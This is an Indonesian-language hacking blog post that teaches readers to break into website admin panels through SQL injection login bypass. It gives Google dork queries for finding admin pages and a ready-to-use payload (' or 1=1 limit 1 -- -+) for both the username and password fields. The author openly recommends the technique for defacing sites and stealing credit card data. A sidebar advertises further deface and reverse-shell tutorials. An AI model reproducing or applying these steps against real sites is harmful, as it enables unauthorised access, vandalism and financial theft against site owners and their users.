• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial Hack Website Dengan Bypass SQL Login

February 7, 2014 by Jack Wilder Leave a Comment

Oke, kali ini saya mau share tutorial SQLi Bypass Login 😀 . Dengan teknik ini, kita bisa login ke halaman admin suatu website tanpa perlu memasukkan user dan password yang dibuat oleh admin. Udah lama sih tutorial ini saya dapat 😀 . Baru sempet share aja . hehehe. Oke langsung saja ke tutorialnya 🙂 .
Google Dork :

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/

Kembangin lagi dorknya ya 🙂

Langkah langkah :
Nah, kalo udah dapet salahsatu web nya, kita login dengan user dan password berikut :
user :  ‘ or 1=1 limit 1 — -+
pass : ‘ or 1=1 limit 1 — -+

Jika vuln, pasti masuk halaman admin kok 🙂

Gampang sekali bukan ?
Cara ini sebenarnya banyak manfaatnya. Selain buat yang hobi deface sana sini, yang mau cari credit card pakai cara ini juga terbukti ampuh 😀

Tapi inget, dosa tanggung sendiri. 😉
Sekian tutorial kali ini . Terimakasih 🙂

Shares

Filed Under: Uncategorized Tagged With: Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Heroku Custom Domain or Subdomain Takeover

MIME Type Sniffing pada Form Upload Gambar

Reverse Shell From Local File Inclusion Exploit

Command Injection Bypass Cheatsheet

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Readme.io Custom Domain or Subdomain Takeover

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

RCE pada Redis via Master-Slave Replication

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

LinuxSec / 83 queries in 0.24 seconds